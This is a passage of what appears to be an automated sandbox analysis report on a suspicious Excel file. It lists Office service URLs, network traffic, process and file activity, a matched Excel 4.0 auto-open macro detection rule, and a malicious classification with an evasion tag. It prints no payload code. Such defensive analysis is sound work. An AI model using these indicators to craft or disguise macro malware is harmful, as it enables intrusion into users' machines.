    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://graph.windows.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://graph.windows.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.windows.local
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://management.azure.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://management.azure.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://messaging.office.com/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officeapps.live.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerlift-user.acompli.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://settings.outlook.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://tasks.office.com
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723

    System Summary:

    barindex
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: doc2227740.xlsInitial sample: EXEC
    Source: doc2227740.xlsInitial sample: EXEC
    Source: doc2227740.xlsOLE indicator, VBA macros: true
    Source: doc2227740.xlsOLE indicator, VBA macros: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXESection loaded: sfc.dllJump to behavior
    Source: doc2227740.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: doc2227740.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal52.evad.winXLS@3/10@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{6833D447-8750-434D-95BD-59BA45422FC2} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{6833D447-8750-434D-95BD-59BA45422FC2} - OProcSessId.datJump to behavior
    Source: doc2227740.xlsOLE indicator, Workbook stream: true
    Source: doc2227740.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: doc2227740.xlsReversingLabs: Detection: 20%
    Source: doc2227740.xlsReversingLabs: Detection: 20%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exeJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.iniJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWindow found: window name: SysTabControl32Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: doc2227740.xlsInitial sample: OLE document summary category = PmFbdwr0TuP
    Source: doc2227740.xlsInitial sample: OLE document summary category = PmFbdwr0TuP
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
